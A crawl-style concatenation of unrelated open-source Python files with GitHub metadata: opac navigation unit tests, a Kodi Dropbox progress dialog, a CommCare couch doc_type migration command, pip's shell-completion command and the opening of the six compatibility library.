    def test_get_prev_issue_when_the_last_issue(self):
        """
        Test get_prev_issue when a nonexistent index would be accessed;
        must return None.
        For the last item of the list the index [last] + 1 does not exist
        (remember the issue list is inverted), and get_prev_issue adds 1,
        so it returns None.
        IMPORTANT: the list is inverted.
        """
        issue1 = utils.makeOneIssue({'year': '2016', 'volume': '1',
                                     'number': '1', 'order': '1', })
        issue2 = utils.makeOneIssue({'year': '2016', 'volume': '1',
                                     'number': '2', 'order': '2', })
        issue3 = utils.makeOneIssue({'year': '2016', 'volume': '1',
                                     'number': '3', 'order': '3', })
        issue4 = utils.makeOneIssue({'year': '2016', 'volume': '1',
                                     'number': '4', 'order': '4', })
        # build an ordered list of issues
        issues = [issue1, issue2, issue3, issue4]
        prev_issue = wutils.get_prev_issue(issues, issue4)
        self.assertIsNone(prev_issue)

    def test_get_next_issue_when_first_item(self):
        """
        Test get_next_issue when the first item is accessed; must return
        None, since there is nothing before it in the inverted list.
        IMPORTANT: the list is inverted.
        """
        issue1 = utils.makeOneIssue({'year': '2016', 'volume': '1',
                                     'number': '1', 'order': '1', })
        issue2 = utils.makeOneIssue({'year': '2016', 'volume': '1',
                                     'number': '2', 'order': '2', })
        issue3 = utils.makeOneIssue({'year': '2016', 'volume': '1',
                                     'number': '3', 'order': '3', })
        issue4 = utils.makeOneIssue({'year': '2016', 'volume': '1',
                                     'number': '4', 'order': '4', })
        # build an ordered list of issues
        issues = [issue1, issue2, issue3, issue4]
        next_issue = wutils.get_next_issue(issues, issue1)
        self.assertIsNone(next_issue)

    # Article
    def test_get_prev_article(self):
        """
        Test of utils.get_prev_article().
        """
        article1 = utils.makeOneArticle({'order': '1', })
        article2 = utils.makeOneArticle({'order': '2', })
        article3 = utils.makeOneArticle({'order': '3', })
        # build an ordered list of articles
        articles = [article1, article2, article3]
        prev_article = wutils.get_prev_article(articles, article2)
        self.assertEqual(prev_article, article1)

    def test_get_next_article(self):
        """
        Test of utils.get_next_article().
        """
        article1 = utils.makeOneArticle({'order': '1', })
        article2 = utils.makeOneArticle({'order': '2', })
        article3 = utils.makeOneArticle({'order': '3', })
        # build an ordered list of articles
        articles = [article1, article2, article3]
        next_article = wutils.get_next_article(articles, article2)
        self.assertEqual(next_article, article3)

    def test_get_next_article_when_last_article(self):
        """
        Test of utils.get_next_article(): for the last article it must
        return None.
        """
        article1 = utils.makeOneArticle({'order': '1', })
        article2 = utils.makeOneArticle({'order': '2', })
        article3 = utils.makeOneArticle({'order': '3', })
        # build an ordered list of articles
        articles = [article1, article2, article3]
        next_article = wutils.get_next_article(articles, article3)
        self.assertIsNone(next_article)

    def test_get_prev_article_when_first_article(self):
        """
        Test of utils.get_prev_article(): for the first article it must
        return None.
        """
        article1 = utils.makeOneArticle({'order': '1', })
        article2 = utils.makeOneArticle({'order': '2', })
        article3 = utils.makeOneArticle({'order': '3', })
        # build an ordered list of articles
        articles = [article1, article2, article3]
        prev_article = wutils.get_prev_article(articles, article1)
        self.assertIsNone(prev_article)
| {
"content_hash": "a1d44d1cf9ddef5a4c7f941730a24c5b",
"timestamp": "",
"source": "github",
"line_count": 208,
"max_line_length": 80,
"avg_line_length": 33.875,
"alnum_prop": 0.536474595515186,
"repo_name": "jfunez/opac",
"id": "9d94171cc3aeede00f166217d39fe6006ec4cb64",
"size": "7107",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "opac/tests/test_utils.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "127482"
},
{
"name": "Dockerfile",
"bytes": "1309"
},
{
"name": "HTML",
"bytes": "184104"
},
{
"name": "JavaScript",
"bytes": "848239"
},
{
"name": "Makefile",
"bytes": "7143"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "565866"
}
],
"symlink_target": ""
} |
#
import xbmcplugin
import xbmcgui
import time
from resources.lib.utils import *
class DropboxBackgroundProgress(xbmcgui.WindowXMLDialog):
    """
    Dialog that shows the progress of a Dropbox background task,
    rendered with the DialogExtendedProgressBar.xml skin file.
    """
    # DialogExtendedProgressBar control IDs
    HEADING_LABEL = 30
    LINE1_LABEL = 31
    PROGRESS_BAR = 32
    # ACTION IDs
    ACTION_SELECT_ITEM = 7
    parentWindow = None
    _heading = ''
    _visible = False
    _closedTime = 0
    TIMEOUT = 7  # secs

    def __init__(self, *args, **kwargs):
        super(DropboxBackgroundProgress, self).__init__(*args, **kwargs)

    def setHeading(self, heading):
        self._heading = heading

    def onInit(self):
        self.getControl(self.HEADING_LABEL).setLabel(self._heading)
        self._visible = True

    def update(self, itemsHandled, itemsTotal, text=None):
        if itemsTotal <= 0:
            return
        # Re-show the dialog once TIMEOUT seconds have passed since the
        # user dismissed it.
        if not self._visible and (self._closedTime + self.TIMEOUT) < time.time():
            self.show()
        if itemsHandled > 0:
            percent = (itemsHandled * 100) / itemsTotal
        else:
            percent = 1
        line1 = "(%s/%s)" % (itemsHandled, itemsTotal)
        if text:
            line1 = line1 + text
        # Some skins don't have the following items in the FileBrowser!
        try:
            self.getControl(self.LINE1_LABEL).setLabel(line1)
        except Exception as e:
            log_debug("DropboxFileBrowser Exception: %s" % repr(e))
        try:
            self.getControl(self.PROGRESS_BAR).setPercent(percent)
        except Exception as e:
            log_debug("DropboxFileBrowser Exception: %s" % repr(e))

    def _dismiss(self):
        # Shared teardown for both click and keyboard dismissal.
        self._visible = False
        self._closedTime = time.time()
        self.close()

    def onClick(self, controlId):
        self._dismiss()

    def onAction(self, action):
        self._dismiss()
| {
"content_hash": "a916404b9c26395a544b1203261956de",
"timestamp": "",
"source": "github",
"line_count": 69,
"max_line_length": 85,
"avg_line_length": 29.782608695652176,
"alnum_prop": 0.5849148418491484,
"repo_name": "TidalPaladin/Superliminal-resin",
"id": "3447b0d21929a49b66b589e01d3be31be98e1c5d",
"size": "2876",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "app/plugin.dbmc/resources/lib/dropboxprogress.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "11"
},
{
"name": "Python",
"bytes": "874230"
},
{
"name": "Shell",
"bytes": "2757"
}
],
"symlink_target": ""
} |
from optparse import make_option
import re
from django.core.management import BaseCommand, CommandError
from corehq.doctypemigrations.migrator_instances import get_migrator_by_slug, \
get_migrator_slugs
# Usage text shown by --help and raised on a bad slug. Fix: the original
# read "with with the following slugs" (duplicated word).
USAGE = """You may run either of the following commands

./manage.py run_doctype_migration <slug> --stats
./manage.py run_doctype_migration <slug> --initial
./manage.py run_doctype_migration <slug> --continuous
./manage.py run_doctype_migration <slug> --cleanup

with the following slugs:

{}

""".format('\n'.join(get_migrator_slugs()))

# Guidance messages for out-of-order phase invocations.
MAYBE_YOU_WANT_TO_RUN_CONTINUOUS = """You have already run an initial migration.
Run

./manage.py run_doctype_migration {} --continuous

for continuous replication starting where you left off.
"""

MAYBE_YOU_WANT_TO_RUN_INITIAL = """You have not yet run an initial migration.
Run

./manage.py run_doctype_migration {} --initial

to do a bulk migrate before continuous replication.
"""

CANNOT_RUN_CONTINUOUS_AFTER_CLEANUP = """You have already run cleanup for this migration.
You cannot run --continuous after --cleanup.
This is actually very important: if you were to run --continuous again, that would
replicate changes from the source db to the target db
resulting in the docs deleted in cleanup also being deleted from the target db!
You're welcome.
"""
class Command(BaseCommand):
    """
    Example: ./manage.py run_doctype_migration user_db_migration

    Drives a couch doc_type migration through its phases:
    --initial (bulk copy), --continuous (changes-feed replication),
    --cleanup (delete from source), plus --stats and
    --erase-continuous-progress helpers.
    """
    help = USAGE
    option_list = BaseCommand.option_list + (
        make_option(
            '--initial',
            action='store_true',
            default=False,
            help="Do a full, initial bulk migration.",
        ),
        make_option(
            '--continuous',
            action='store_true',
            default=False,
            help=("Start a continuous migration to keep things topped off "
                  "based on the changes feed. This should be run in a screen "
                  "session and cancelled with ^C once it's no longer needed."),
        ),
        make_option(
            '--cleanup',
            action='store_true',
            default=False,
            help="Delete the old documents still in the source db.",
        ),
        make_option(
            '--stats',
            action='store_true',
            default=False,
            help="Output misc info about the status of the migration.",
        ),
        make_option(
            '--erase-continuous-progress',
            action='store_true',
            default=False
        )
    )

    def handle(self, migrator_slug=None, initial=None, continuous=None, cleanup=None,
               stats=None, erase_continuous_progress=None, **options):
        """Validate the flag combination and dispatch to the phase handlers."""
        try:
            migrator = get_migrator_by_slug(migrator_slug)
        except KeyError:
            raise CommandError(USAGE)
        if not any((initial, continuous, cleanup, stats, erase_continuous_progress)):
            raise CommandError('initial, continuous, cleanup, stats, or '
                               'erase_continuous_progress must be set')
        if cleanup and (initial or continuous):
            raise CommandError('cleanup must be run alone')

        if stats:
            self.handle_stats(migrator)
        if initial:
            if migrator.last_seq:
                raise CommandError(MAYBE_YOU_WANT_TO_RUN_CONTINUOUS.format(migrator_slug))
            self.handle_initial(migrator)
        if erase_continuous_progress:
            if not migrator.original_seq:
                # BUG FIX: this CommandError was previously constructed but
                # never raised, so the guard silently did nothing.
                raise CommandError(MAYBE_YOU_WANT_TO_RUN_INITIAL.format(migrator_slug))
            if migrator.cleanup_complete:
                raise CommandError(CANNOT_RUN_CONTINUOUS_AFTER_CLEANUP)
            self.handle_erase_continuous_progress(migrator)
        if continuous:
            if not migrator.last_seq:
                raise CommandError(MAYBE_YOU_WANT_TO_RUN_INITIAL.format(migrator_slug))
            if migrator.cleanup_complete:
                # Replicating after cleanup would propagate the deletions.
                raise CommandError(CANNOT_RUN_CONTINUOUS_AFTER_CLEANUP)
            self.handle_continuous(migrator)
        if cleanup:
            confirmation = raw_input(
                "Cleanup will remove doc_types ({}) from db {}\n"
                "I recommend running './manage.py delete_doc_conflicts' "
                "first or some docs might not actually be deleted.\n"
                "Are you sure you want to proceed? [y/n]"
                .format(', '.join(migrator.doc_types), migrator.source_db))
            if confirmation == 'y':
                if migrator.docs_are_replicating():
                    self.stdout.write(
                        "It looks like replication is still happening, please track "
                        "down and cancel before attempting to cleanup, lest you "
                        "replicate the deletions. Yikes!")
                    return
                self.handle_cleanup(migrator)

    @staticmethod
    def handle_initial(migrator):
        # Phase 1: bulk migrate (delegates to the migrator).
        migrator.phase_1_bulk_migrate()

    def handle_continuous(self, migrator):
        # Phase 2: continuous replication, reporting progress per batch.
        self.stderr.write("Starting continuous replication...")
        migration = migrator.phase_2_continuous_migrate_interactive()
        for status_update in migration:
            self.stdout.write('Read {} changes, saved seq {}'.format(
                status_update.changes_read, status_update.last_seq))
            if status_update.caught_up:
                self.stdout.write('All caught up!')

    def handle_erase_continuous_progress(self, migrator):
        # Delegates to migrator.erase_continuous_progress().
        migrator.erase_continuous_progress()

    def handle_cleanup(self, migrator):
        # Phase 3: delete migrated doc_types from the source db.
        migrator.phase_3_clean_up()

    def handle_stats(self, migrator):
        """Print per-doc_type counts for the source and target dbs."""
        [(source_db, source_counts),
         (target_db, target_counts)] = migrator.get_doc_counts()
        self.stdout.write('Source DB: {}'.format(_scrub_uri(source_db.uri)))
        self.stdout.write('Target DB: {}'.format(_scrub_uri(target_db.uri)))
        self.stdout.write('')
        self.stdout.write('{:^30}\tSource\tTarget'.format('doc_type'))
        for doc_type in sorted(migrator.doc_types):
            self.stdout.write(
                '{:<30}\t{}\t{}'
                .format(doc_type, source_counts[doc_type], target_counts[doc_type]))
def _scrub_uri(uri):
return re.sub(r'//(.*):(.*)@', r'//\1:******@', uri)
| {
"content_hash": "8052acff97cac255f8972e2ddc6d94d7",
"timestamp": "",
"source": "github",
"line_count": 166,
"max_line_length": 90,
"avg_line_length": 37.825301204819276,
"alnum_prop": 0.608058608058608,
"repo_name": "qedsoftware/commcare-hq",
"id": "54af3f882c5b05f30249c8d7ef6eb4e0b3bda3fe",
"size": "6279",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "corehq/doctypemigrations/management/commands/run_doctype_migration.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ActionScript",
"bytes": "15950"
},
{
"name": "CSS",
"bytes": "508392"
},
{
"name": "HTML",
"bytes": "2869325"
},
{
"name": "JavaScript",
"bytes": "2395360"
},
{
"name": "PHP",
"bytes": "2232"
},
{
"name": "PLpgSQL",
"bytes": "125298"
},
{
"name": "Python",
"bytes": "14670713"
},
{
"name": "Shell",
"bytes": "37514"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
import sys
import textwrap
from pip._internal.cli.base_command import Command
from pip._internal.utils.misc import get_prog
BASE_COMPLETION = """
# pip {shell} completion start{script}# pip {shell} completion end
"""
COMPLETION_SCRIPTS = {
'bash': """
_pip_completion()
{{
COMPREPLY=( $( COMP_WORDS="${{COMP_WORDS[*]}}" \\
COMP_CWORD=$COMP_CWORD \\
PIP_AUTO_COMPLETE=1 $1 2>/dev/null ) )
}}
complete -o default -F _pip_completion {prog}
""",
'zsh': """
function _pip_completion {{
local words cword
read -Ac words
read -cn cword
reply=( $( COMP_WORDS="$words[*]" \\
COMP_CWORD=$(( cword-1 )) \\
PIP_AUTO_COMPLETE=1 $words[1] 2>/dev/null ))
}}
compctl -K _pip_completion {prog}
""",
'fish': """
function __fish_complete_pip
set -lx COMP_WORDS (commandline -o) ""
set -lx COMP_CWORD ( \\
math (contains -i -- (commandline -t) $COMP_WORDS)-1 \\
)
set -lx PIP_AUTO_COMPLETE 1
string split \\ -- (eval $COMP_WORDS[1])
end
complete -fa "(__fish_complete_pip)" -c {prog}
""",
}
class CompletionCommand(Command):
    """A helper command to be used for command completion."""
    ignore_require_venv = True

    def __init__(self, *args, **kw):
        super(CompletionCommand, self).__init__(*args, **kw)

        # Register one store_const option per supported shell.
        shell_flags = [
            ('--bash', '-b', 'bash', 'Emit completion code for bash'),
            ('--zsh', '-z', 'zsh', 'Emit completion code for zsh'),
            ('--fish', '-f', 'fish', 'Emit completion code for fish'),
        ]
        for long_opt, short_opt, shell_name, help_text in shell_flags:
            self.cmd_opts.add_option(
                long_opt, short_opt,
                action='store_const',
                const=shell_name,
                dest='shell',
                help=help_text)

        self.parser.insert_option_group(0, self.cmd_opts)

    def run(self, options, args):
        """Prints the completion code of the given shell"""
        supported = COMPLETION_SCRIPTS.keys()
        if options.shell in supported:
            script = textwrap.dedent(
                COMPLETION_SCRIPTS.get(options.shell, '').format(
                    prog=get_prog())
            )
            print(BASE_COMPLETION.format(script=script, shell=options.shell))
        else:
            flags = ['--' + shell for shell in sorted(supported)]
            sys.stderr.write(
                'ERROR: You must pass {}\n' .format(' or '.join(flags))
            )
| {
"content_hash": "68abb3c6026f2db94fcc9f35c700284a",
"timestamp": "",
"source": "github",
"line_count": 92,
"max_line_length": 79,
"avg_line_length": 30.967391304347824,
"alnum_prop": 0.5057915057915058,
"repo_name": "davidharvey1986/pyRRG",
"id": "910fcbfe358d6220e71c03cb9e3409590bc11802",
"size": "2957",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "unittests/bugFixPyRRG/lib/python3.7/site-packages/pip/_internal/commands/completion.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "PowerShell",
"bytes": "8321"
},
{
"name": "Python",
"bytes": "5803472"
},
{
"name": "Shell",
"bytes": "3862"
}
],
"symlink_target": ""
} |
"""Utilities for writing code that runs on Python 2 and 3"""
# Copyright (c) 2010-2013 Benjamin Peterson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import operator
import sys
import types
__author__ = "Benjamin Peterson <benjamin@python.org>"
__version__ = "1.4.1"


# Useful for very coarse version differentiation.
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3

# Per-version aliases for the basic type categories, so client code can
# write e.g. ``isinstance(x, six.string_types)`` on either Python line.
if PY3:
    string_types = str,
    integer_types = int,
    class_types = type,
    text_type = str
    binary_type = bytes

    MAXSIZE = sys.maxsize
else:
    string_types = basestring,
    integer_types = (int, long)
    class_types = (type, types.ClassType)
    text_type = unicode
    binary_type = str

    if sys.platform.startswith("java"):
        # Jython always uses 32 bits.
        MAXSIZE = int((1 << 31) - 1)
    else:
        # It's possible to have sizeof(long) != sizeof(Py_ssize_t).
        # Probe the platform: len() must return a Py_ssize_t, so a
        # too-large __len__ raises OverflowError on 32-bit builds.
        class X(object):
            def __len__(self):
                return 1 << 31
        try:
            len(X())
        except OverflowError:
            # 32-bit
            MAXSIZE = int((1 << 31) - 1)
        else:
            # 64-bit
            MAXSIZE = int((1 << 63) - 1)
        del X
def _add_doc(func, doc):
"""Add documentation to a function."""
func.__doc__ = doc
def _import_module(name):
    """Import module, returning the module after the last dot.

    ``__import__("a.b")`` returns the top-level package ``a``, so the
    fully dotted module is fetched from ``sys.modules`` instead.
    """
    __import__(name)
    return sys.modules[name]
class _LazyDescr(object):
    """Descriptor that resolves a moved object on first attribute access.

    Subclasses implement ``_resolve()``. On first access the resolved
    value is cached on the instance and this descriptor removes itself
    from the class, so later lookups bypass it entirely.
    """

    def __init__(self, name):
        # Attribute name under which the resolved object will be stored.
        self.name = name

    def __get__(self, obj, tp):
        result = self._resolve()
        # Cache the resolved object on the instance (the moves module).
        setattr(obj, self.name, result)
        # This is a bit ugly, but it avoids running this again.
        delattr(tp, self.name)
        return result
class MovedModule(_LazyDescr):
    """Lazy placeholder for a module that was renamed between Python 2 and 3."""

    def __init__(self, name, old, new=None):
        super(MovedModule, self).__init__(name)
        if not PY3:
            self.mod = old
        else:
            # On Python 3 the new name defaults to the move's own name.
            self.mod = name if new is None else new

    def _resolve(self):
        return _import_module(self.mod)
class MovedAttribute(_LazyDescr):
    """Lazy placeholder for an attribute that moved between modules."""

    def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None):
        super(MovedAttribute, self).__init__(name)
        if PY3:
            # Module and attribute names default to the move's own name.
            self.mod = name if new_mod is None else new_mod
            if new_attr is not None:
                self.attr = new_attr
            elif old_attr is not None:
                self.attr = old_attr
            else:
                self.attr = name
        else:
            self.mod = old_mod
            self.attr = name if old_attr is None else old_attr

    def _resolve(self):
        module = _import_module(self.mod)
        return getattr(module, self.attr)
class _MovedItems(types.ModuleType):
    """Lazy loading of moved objects"""


# Registry of everything exposed under ``six.moves``: each entry records a
# name together with its Python 2 and Python 3 locations.
_moved_attributes = [
    MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"),
    MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"),
    MovedAttribute("filterfalse", "itertools", "itertools", "ifilterfalse", "filterfalse"),
    MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"),
    MovedAttribute("map", "itertools", "builtins", "imap", "map"),
    MovedAttribute("range", "__builtin__", "builtins", "xrange", "range"),
    MovedAttribute("reload_module", "__builtin__", "imp", "reload"),
    MovedAttribute("reduce", "__builtin__", "functools"),
    MovedAttribute("StringIO", "StringIO", "io"),
    MovedAttribute("UserString", "UserString", "collections"),
    MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"),
    MovedAttribute("zip", "itertools", "builtins", "izip", "zip"),
    MovedAttribute("zip_longest", "itertools", "itertools", "izip_longest", "zip_longest"),
    MovedModule("builtins", "__builtin__"),
    MovedModule("configparser", "ConfigParser"),
    MovedModule("copyreg", "copy_reg"),
    MovedModule("dbm_gnu", "gdbm", "dbm.gnu"),
    MovedModule("http_cookiejar", "cookielib", "http.cookiejar"),
    MovedModule("http_cookies", "Cookie", "http.cookies"),
    MovedModule("html_entities", "htmlentitydefs", "html.entities"),
    MovedModule("html_parser", "HTMLParser", "html.parser"),
    MovedModule("http_client", "httplib", "http.client"),
    MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"),
    MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"),
    MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"),
    MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"),
    MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"),
    MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"),
    MovedModule("cPickle", "cPickle", "pickle"),
    MovedModule("queue", "Queue"),
    MovedModule("reprlib", "repr"),
    MovedModule("socketserver", "SocketServer"),
    MovedModule("_thread", "thread", "_thread"),
    MovedModule("tkinter", "Tkinter"),
    MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"),
    MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"),
    MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"),
    MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"),
    MovedModule("tkinter_tix", "Tix", "tkinter.tix"),
    MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"),
    MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"),
    MovedModule("tkinter_colorchooser", "tkColorChooser",
                "tkinter.colorchooser"),
    MovedModule("tkinter_commondialog", "tkCommonDialog",
                "tkinter.commondialog"),
    MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"),
    MovedModule("tkinter_font", "tkFont", "tkinter.font"),
    MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"),
    MovedModule("tkinter_tksimpledialog", "tkSimpleDialog",
                "tkinter.simpledialog"),
    MovedModule("urllib_parse", __name__ + ".moves.urllib_parse", "urllib.parse"),
    MovedModule("urllib_error", __name__ + ".moves.urllib_error", "urllib.error"),
    MovedModule("urllib", __name__ + ".moves.urllib", __name__ + ".moves.urllib"),
    MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"),
    MovedModule("xmlrpc_client", "xmlrpclib", "xmlrpc.client"),
    MovedModule("winreg", "_winreg"),
]
# Install each move as a lazy class attribute on _MovedItems.
for attr in _moved_attributes:
    setattr(_MovedItems, attr.name, attr)
del attr

# Register the pseudo-module in sys.modules under "<package>.moves".
moves = sys.modules[__name__ + ".moves"] = _MovedItems(__name__ + ".moves")
class Module_six_moves_urllib_parse(types.ModuleType):
    """Lazy loading of moved objects in six.moves.urllib_parse"""


_urllib_parse_moved_attributes = [
    MovedAttribute("ParseResult", "urlparse", "urllib.parse"),
    MovedAttribute("parse_qs", "urlparse", "urllib.parse"),
    MovedAttribute("parse_qsl", "urlparse", "urllib.parse"),
    MovedAttribute("urldefrag", "urlparse", "urllib.parse"),
    MovedAttribute("urljoin", "urlparse", "urllib.parse"),
    MovedAttribute("urlparse", "urlparse", "urllib.parse"),
    MovedAttribute("urlsplit", "urlparse", "urllib.parse"),
    MovedAttribute("urlunparse", "urlparse", "urllib.parse"),
    MovedAttribute("urlunsplit", "urlparse", "urllib.parse"),
    MovedAttribute("quote", "urllib", "urllib.parse"),
    MovedAttribute("quote_plus", "urllib", "urllib.parse"),
    MovedAttribute("unquote", "urllib", "urllib.parse"),
    MovedAttribute("unquote_plus", "urllib", "urllib.parse"),
    MovedAttribute("urlencode", "urllib", "urllib.parse"),
]
# Install the moves as lazy class attributes.
for attr in _urllib_parse_moved_attributes:
    setattr(Module_six_moves_urllib_parse, attr.name, attr)
del attr

# Register under both the flat and the Python 3-style dotted name.
sys.modules[__name__ + ".moves.urllib_parse"] = Module_six_moves_urllib_parse(__name__ + ".moves.urllib_parse")
sys.modules[__name__ + ".moves.urllib.parse"] = Module_six_moves_urllib_parse(__name__ + ".moves.urllib.parse")
class Module_six_moves_urllib_error(types.ModuleType):
    """Lazy loading of moved objects in six.moves.urllib_error"""


_urllib_error_moved_attributes = [
    MovedAttribute("URLError", "urllib2", "urllib.error"),
    MovedAttribute("HTTPError", "urllib2", "urllib.error"),
    MovedAttribute("ContentTooShortError", "urllib", "urllib.error"),
]
# Install the moves as lazy class attributes.
for attr in _urllib_error_moved_attributes:
    setattr(Module_six_moves_urllib_error, attr.name, attr)
del attr

# Register under both the flat and the Python 3-style dotted name.
sys.modules[__name__ + ".moves.urllib_error"] = Module_six_moves_urllib_error(__name__ + ".moves.urllib_error")
sys.modules[__name__ + ".moves.urllib.error"] = Module_six_moves_urllib_error(__name__ + ".moves.urllib.error")
class Module_six_moves_urllib_request(types.ModuleType):
    """Lazy loading of moved objects in six.moves.urllib_request"""


_urllib_request_moved_attributes = [
    MovedAttribute("urlopen", "urllib2", "urllib.request"),
    MovedAttribute("install_opener", "urllib2", "urllib.request"),
    MovedAttribute("build_opener", "urllib2", "urllib.request"),
    MovedAttribute("pathname2url", "urllib", "urllib.request"),
    MovedAttribute("url2pathname", "urllib", "urllib.request"),
    MovedAttribute("getproxies", "urllib", "urllib.request"),
    MovedAttribute("Request", "urllib2", "urllib.request"),
    MovedAttribute("OpenerDirector", "urllib2", "urllib.request"),
    MovedAttribute("HTTPDefaultErrorHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPRedirectHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPCookieProcessor", "urllib2", "urllib.request"),
    MovedAttribute("ProxyHandler", "urllib2", "urllib.request"),
    MovedAttribute("BaseHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPPasswordMgr", "urllib2", "urllib.request"),
    MovedAttribute("HTTPPasswordMgrWithDefaultRealm", "urllib2", "urllib.request"),
    MovedAttribute("AbstractBasicAuthHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPBasicAuthHandler", "urllib2", "urllib.request"),
    MovedAttribute("ProxyBasicAuthHandler", "urllib2", "urllib.request"),
    MovedAttribute("AbstractDigestAuthHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPDigestAuthHandler", "urllib2", "urllib.request"),
    MovedAttribute("ProxyDigestAuthHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPSHandler", "urllib2", "urllib.request"),
    MovedAttribute("FileHandler", "urllib2", "urllib.request"),
    MovedAttribute("FTPHandler", "urllib2", "urllib.request"),
    MovedAttribute("CacheFTPHandler", "urllib2", "urllib.request"),
    MovedAttribute("UnknownHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPErrorProcessor", "urllib2", "urllib.request"),
    MovedAttribute("urlretrieve", "urllib", "urllib.request"),
    MovedAttribute("urlcleanup", "urllib", "urllib.request"),
    MovedAttribute("URLopener", "urllib", "urllib.request"),
    MovedAttribute("FancyURLopener", "urllib", "urllib.request"),
]
# Install the moves as lazy class attributes.
for attr in _urllib_request_moved_attributes:
    setattr(Module_six_moves_urllib_request, attr.name, attr)
del attr

# Register under both the flat and the Python 3-style dotted name.
sys.modules[__name__ + ".moves.urllib_request"] = Module_six_moves_urllib_request(__name__ + ".moves.urllib_request")
sys.modules[__name__ + ".moves.urllib.request"] = Module_six_moves_urllib_request(__name__ + ".moves.urllib.request")
class Module_six_moves_urllib_response(types.ModuleType):
    """Lazy loading of moved objects in six.moves.urllib_response"""


_urllib_response_moved_attributes = [
    MovedAttribute("addbase", "urllib", "urllib.response"),
    MovedAttribute("addclosehook", "urllib", "urllib.response"),
    MovedAttribute("addinfo", "urllib", "urllib.response"),
    MovedAttribute("addinfourl", "urllib", "urllib.response"),
]
# Install the moves as lazy class attributes.
for attr in _urllib_response_moved_attributes:
    setattr(Module_six_moves_urllib_response, attr.name, attr)
del attr

# Register under both the flat and the Python 3-style dotted name.
sys.modules[__name__ + ".moves.urllib_response"] = Module_six_moves_urllib_response(__name__ + ".moves.urllib_response")
sys.modules[__name__ + ".moves.urllib.response"] = Module_six_moves_urllib_response(__name__ + ".moves.urllib.response")
class Module_six_moves_urllib_robotparser(types.ModuleType):
    """Lazy loading of moved objects in six.moves.urllib_robotparser"""
# robotparser (Py2) became urllib.robotparser (Py3); only one name moved.
_urllib_robotparser_moved_attributes = [
    MovedAttribute("RobotFileParser", "robotparser", "urllib.robotparser"),
]
for attr in _urllib_robotparser_moved_attributes:
    setattr(Module_six_moves_urllib_robotparser, attr.name, attr)
del attr
# Register under both the underscore and the dotted name.
sys.modules[__name__ + ".moves.urllib_robotparser"] = Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib_robotparser")
sys.modules[__name__ + ".moves.urllib.robotparser"] = Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib.robotparser")
class Module_six_moves_urllib(types.ModuleType):
    """Create a six.moves.urllib namespace that resembles the Python 3 namespace"""
    # Bind the previously registered lazy submodules as attributes so that
    # six.moves.urllib.parse etc. mirror the Python 3 package layout.
    parse = sys.modules[__name__ + ".moves.urllib_parse"]
    error = sys.modules[__name__ + ".moves.urllib_error"]
    request = sys.modules[__name__ + ".moves.urllib_request"]
    response = sys.modules[__name__ + ".moves.urllib_response"]
    robotparser = sys.modules[__name__ + ".moves.urllib_robotparser"]
sys.modules[__name__ + ".moves.urllib"] = Module_six_moves_urllib(__name__ + ".moves.urllib")
def add_move(move):
    """Register *move* as an attribute of the six.moves pseudo-module."""
    # The pseudo-module is a class; attaching the MovedAttribute/MovedModule
    # descriptor makes it resolvable (lazily) on all existing instances.
    name = move.name
    setattr(_MovedItems, name, move)
